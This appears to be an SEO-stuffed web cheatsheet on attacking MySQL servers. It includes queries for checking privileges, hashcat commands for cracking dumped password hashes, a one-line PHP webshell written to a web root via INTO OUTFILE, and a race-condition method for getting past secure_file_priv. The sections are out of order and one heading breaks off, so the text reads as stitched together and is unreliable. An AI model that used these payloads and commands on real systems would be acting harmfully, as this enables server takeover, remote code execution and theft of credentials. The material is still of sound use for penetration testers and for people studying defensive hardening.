Mysql Hacktricks Verified

Mastering MySQL Attacks: The Ultimate HackTricks Verified Cheatsheet

Keyword Focus: mysql hacktricks verified

2.1 Check Existing Privileges

SELECT * FROM information_schema.user_privileges WHERE grantee LIKE '%youruser%';
SELECT * FROM mysql.user WHERE user='youruser'\G
SHOW GRANTS FOR CURRENT_USER();

Look for:

  • FILE – read/write files.
  • SUPER – disable logging, change replication.
  • CREATE FUNCTION – load UDFs.
  • SELECT on mysql.user – dump password hashes.

5.2 Cracking MySQL Hashes

  • mysql_native_password: SHA1(SHA1(password)). Use hashcat -m 300 or john --format=mysql.
  • caching_sha2_password: hashcat -m 7400.

Verified Hashcat command:

hashcat -m 300 hash.txt /usr/share/wordlists/rockyou.txt

2. Writing Files (RCE / Webshell)

This is the pivot point for most MySQL hacks. If secure_file_priv is not restricting you to a specific directory, you can write files to the disk.

The "HackTrick": You can write a PHP webshell (or any other script) directly into a web directory if you know the path. mysql hacktricks verified

SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

Why it's interesting:

  • The Format Pitfall: HackTricks highlights that INTO OUTFILE adds a newline character at the end of the file. While this usually breaks binary files (like executables), it works perfectly for text-based scripts like PHP, JSP, or ASPX webshells.
  • Permissions: The file created is readable by everyone (world-readable), which is exactly what you want for a webshell, but bad for security.
  • No Overwrite: You cannot overwrite existing files. This prevents you from corrupting system binaries, but it also means you have to find a new filename.

2. Privilege Escalation via MySQL Features

Once authenticated, HackTricks focuses on leveraging MySQL’s own functionality to escalate privileges on the database server or even the underlying operating system. Look for:

Part 6: Post-Exploitation – Maintaining Access

5.1 Bypassing secure_file_priv via Race Conditions (Linux)

In some older MySQL/MariaDB versions, a race condition exists between checking secure_file_priv and opening the file. Not reliable on patched systems, but for CTFs, try:

  • Create a symlink from a permitted directory to a web root.
  • Use SELECT ... INTO DUMPFILE and quickly replace the target file during the 1ms window.